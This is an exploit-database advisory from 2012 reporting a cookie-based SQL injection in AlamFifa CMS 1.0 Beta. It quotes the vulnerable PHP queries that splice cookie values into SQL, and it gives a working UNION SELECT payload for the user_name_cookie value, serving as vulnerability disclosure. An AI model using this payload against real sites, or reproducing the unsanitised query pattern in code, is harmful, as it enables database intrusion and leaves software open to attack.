Bug: AlamFifa CMS 1.0 Beta SQL Injection ( Ascii Version )

Search:
WLB2

AlamFifa CMS 1.0 Beta SQL Injection

Published
Credit
Risk
2012.10.01
L0n3ly-H34rT
Medium
CWE
CVE
Local
Remote
CWE-89
N/A ( Add )
No
Yes

############################################
### Exploit Title: AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability
### Date: 30/9/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.traidnt.net/vb/traidnt2143253/
### Software Link: http://www.alamrb.com/images/up/15-08-2012-19-15-45-17314.zip
### Version: 1.0
### Tested on: Linux/Windows
############################################

# Files affected :

- ( ajax.php ) on line 6:

$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass
= '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));

- ( /files/header.php ) on line 34 :

$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass
= '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));

# user_name_cookie is affected in cookie ..

# P.0.C :

http://127.0.0.1/alamfifa1/index.php

- Inject the cookie by any tool like this :

user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT
93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;

############################################

# You can fix it here :

http://www.traXXXdnt.net/vb/traidnt2143253-2/#post19292739

# Greetz to my friendz

References:

http://www.traidnt.net/vb/traidnt2143253/
http://www.alamrb.com/images/up/15-08-2012-19-15-45-17314.zip

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version